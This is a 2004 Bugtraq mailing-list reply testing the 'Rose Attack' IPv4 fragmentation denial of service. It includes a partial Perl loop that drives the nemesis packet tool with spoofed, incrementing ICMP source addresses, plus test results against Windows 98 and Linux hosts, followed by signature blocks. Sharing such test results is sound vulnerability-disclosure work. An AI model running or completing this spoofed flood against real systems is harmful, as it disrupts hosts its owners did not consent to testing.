[34439] in bugtraq
Re: IPv4 fragmentation --> The Rose Attack
daemon@ATHENA.MIT.EDU (Ventsislav Genchev)
Wed Apr 7 17:07:07 2004
Message-ID: <4073C25A.40201@atlantis.bg>
Date: Wed, 07 Apr 2004 11:56:58 +0300
From: Ventsislav Genchev <vigour@atlantis.bg>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms020908060005020309080707"
--------------ms020908060005020309080707
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I've just made some tests following the described example at:
http://gandalf.home.digital.net/TestProc.txt
To use different src addresses in the attack i've used the following
example:
#!/usr/bin/perl
$src=$ARGV[1];
if($src=~ /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/) {
$one=$1;
$two=$2;
$three=$3;
$four=$4;
}
while(1) {
system("nemesis icmp -S $one.$two.$three.$four -D $ARGV[0] ....... );
..................
..................
$four++;
if($four>=254) { $three++; $four=1; }
if($three>=254) { $two++; $three=1; }
if($two>=254) { $one++; $two=1; }
#sleep(2);
}
I've tested the attack on 4 machines..
The first two were running windows 98 SE with all patches and service
packs... the CPU stuck the 100% as soon as the attack started..
The last two machines were running Fedora Core 1 Linux and RedHat Linux
9... no success here... the attack seems not to bother the normal work
of the PCs... The RedHat Linux uses kernel-2.4.20-30.9...
- --
Ventsislav Genchev
Atlantis BG, Ltd.
E-mail: vigour@atlantis.bg
tel: +35928757001
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFAc8JawxiN6NaquRwRAuUFAKCNLzN5vCk8Ac4EB+khIFai1GU27ACfd7hf
mlyeGSn87eVVpeYU3J9HlSI=
=/+Bv
-----END PGP SIGNATURE-----
--------------ms020908060005020309080707
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIII7TCC
AtEwggI6oAMCAQICAwv+mDANBgkqhkiG9w0BAQQFADBiMQswCQYDVQQGEwJaQTElMCMGA1UE
ChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNv
bmFsIEZyZWVtYWlsIElzc3VpbmcgQ0EwHhcNMDQwMzI1MTA0ODQ3WhcNMDUwMzI1MTA0ODQ3
WjBEMR8wHQYDVQQDExZUaGF3dGUgRnJlZW1haWwgTWVtYmVyMSEwHwYJKoZIhvcNAQkBFhJ2
aWdvdXJAYXRsYW50aXMuYmcwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDH+lUH
C6lZMkbd2ZEBHWZDSo2cc3Za2Vlm6gWotMBEffD8lXHL9VWVgW1JBzbUfD0//5pdSv/OKJaC
fUbN8dH3OmZw3ovLBleq4hXGMp2Epv/UrIUVnXK5RdF3nkR/TouE/J9gsFyNcPjyHqACI11R
nu7lQPnCbADcbvWudAVLcFUYUCOD+dEo5ZHqr84DGupvkVWnyYwFU6RoSNY79S46ojUSNaae
T5UXhvCN7rm2QACPLjeRws28UbbUT6swKCd7qhF0R2ho4lchOikpzDuZRVc/Ny3P+DennPPK
yZJkqUnZu2TmtXUkId1Djun/FSrltNO3ovU2R/0X/IRdNLCBAgMBAAGjLzAtMB0GA1UdEQQW
MBSBEnZpZ291ckBhdGxhbnRpcy5iZzAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3DQEBBAUAA4GB
AJ8wGtIEASbFv4ql5SOfa87VnvamHRkoQ+ipTRFp0DsGsuCZMuqEovsj8yylp9uHiX88LcAA
XQXW4YmfrH2IoMpDgMpNsk+0QomkAy6dl62Rh2ccUAYTzhxOLAxTRB1sil630MRPleXYPeKV
yx8YXA/fSFldw19RHf2WyGWkRbhPMIIC0TCCAjqgAwIBAgIDC/6YMA0GCSqGSIb3DQEBBAUA
MGIxCzAJBgNVBAYTAlpBMSUwIwYDVQQKExxUaGF3dGUgQ29uc3VsdGluZyAoUHR5KSBMdGQu
MSwwKgYDVQQDEyNUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwgSXNzdWluZyBDQTAeFw0wNDAz
MjUxMDQ4NDdaFw0wNTAzMjUxMDQ4NDdaMEQxHzAdBgNVBAMTFlRoYXd0ZSBGcmVlbWFpbCBN
ZW1iZXIxITAfBgkqhkiG9w0BCQEWEnZpZ291ckBhdGxhbnRpcy5iZzCCASIwDQYJKoZIhvcN
AQEBBQADggEPADCCAQoCggEBAMf6VQcLqVkyRt3ZkQEdZkNKjZxzdlrZWWbqBai0wER98PyV
ccv1VZWBbUkHNtR8PT//ml1K/84oloJ9Rs3x0fc6ZnDei8sGV6riFcYynYSm/9SshRWdcrlF
0XeeRH9Oi4T8n2CwXI1w+PIeoAIjXVGe7uVA+cJsANxu9a50BUtwVRhQI4P50SjlkeqvzgMa
6m+RVafJjAVTpGhI1jv1LjqiNRI1pp5PlReG8I3uubZAAI8uN5HCzbxRttRPqzAoJ3uqEXRH
aGjiVyE6KSnMO5lFVz83Lc/4N6ec88rJkmSpSdm7ZOa1dSQh3UOO6f8VKuW007ei9TZH/Rf8
hF00sIECAwEAAaMvMC0wHQYDVR0RBBYwFIESdmlnb3VyQGF0bGFudGlzLmJnMAwGA1UdEwEB
/wQCMAAwDQYJKoZIhvcNAQEEBQADgYEAnzAa0gQBJsW/iqXlI59rztWe9qYdGShD6KlNEWnQ
Oway4Jky6oSi+yPzLKWn24eJfzwtwABdBdbhiZ+sfYigykOAyk2yT7RCiaQDLp2XrZGHZxxQ
BhPOHE4sDFNEHWyKXrfQxE+V5dg94pXLHxhcD99IWV3DX1Ed/ZbIZaRFuE8wggM/MIICqKAD
AgECAgENMA0GCSqGSIb3DQEBBQUAMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVy
biBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5n
MSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtU
aGF3dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZy
ZWVtYWlsQHRoYXd0ZS5jb20wHhcNMDMwNzE3MDAwMDAwWhcNMTMwNzE2MjM1OTU5WjBiMQsw
CQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoG
A1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0EwgZ8wDQYJKoZIhvcN
AQEBBQADgY0AMIGJAoGBAMSmPFVzVftOucqZWh5owHUEcJ3f6f+jHuy9zfVb8hp2vX8MOmHy
v1HOAdTlUAow1wJjWiyJFXCO3cnwK4Vaqj9xVsuvPAsH5/EfkTYkKhPPK9Xzgnc9A74r/rsY
Pge/QIACZNenprufZdHFKlSFD0gEf6e20TxhBEAeZBlyYLf7AgMBAAGjgZQwgZEwEgYDVR0T
AQH/BAgwBgEB/wIBADBDBgNVHR8EPDA6MDigNqA0hjJodHRwOi8vY3JsLnRoYXd0ZS5jb20v
VGhhd3RlUGVyc29uYWxGcmVlbWFpbENBLmNybDALBgNVHQ8EBAMCAQYwKQYDVR0RBCIwIKQe
MBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDItMTM4MA0GCSqGSIb3DQEBBQUAA4GBAEiM0VCD
6gsuzA2jZqxnD3+vrL7CF6FDlpSdf0whuPg2H6otnzYvwPQcUCCTcDz9reFhYsPZOhl+hLGZ
GwDFGguCdJ4lUJRix9sncVcljd2pnDmOjCBPZV+V2vf3h9bGCE6u9uo05RAaWzVNd+NWIXiC
3CEZNd4ksdMdRv9dX2VPMYIDOzCCAzcCAQEwaTBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMc
VGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFs
IEZyZWVtYWlsIElzc3VpbmcgQ0ECAwv+mDAJBgUrDgMCGgUAoIIBpzAYBgkqhkiG9w0BCQMx
CwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wNDA0MDcwODU2NThaMCMGCSqGSIb3DQEJ
BDEWBBSAE4on8c1Quk/6aS7RcY6gCctoRDBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMH
MA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzANBggqhkiG9w0DAgIB
KDB4BgkrBgEEAYI3EAQxazBpMGIxCzAJBgNVBAYTAlpBMSUwIwYDVQQKExxUaGF3dGUgQ29u
c3VsdGluZyAoUHR5KSBMdGQuMSwwKgYDVQQDEyNUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwg
SXNzdWluZyBDQQIDC/6YMHoGCyqGSIb3DQEJEAILMWugaTBiMQswCQYDVQQGEwJaQTElMCMG
A1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBl
cnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0ECAwv+mDANBgkqhkiG9w0BAQEFAASCAQB01C51
9DZVF1BojBNzibwke6sdwkH4Sc5U1Z6Ii1fWrq2Z/FxVqIoCi2KZxpsvObL26hUxJ6oX4Y+f
GQxZJLUE1mQ99aSPgH0JdgRyUzYgD93f4qsd3TOF4MKA/yC903tPc7Vwr3LDAFsZnA7AIM/6
+kcqp8IDNrN9r/2ioOIoBJkU+IdIhhkUu0QbJc33nzg+VmeqO7DeZDXosI9oCEIJ+7s3YqEC
kUewdKw18uK+CBNVq5vmi1XfKY76HY3fb1o3uMKhf1qZesFDRIA6IO+9O4EwiF2oufUGIfzP
o2NUtfKQCwTTjQJAQ+H2dZzbhV5yUu5RqYvxGBzjIfC8+S2WAAAAAAAA
--------------ms020908060005020309080707--
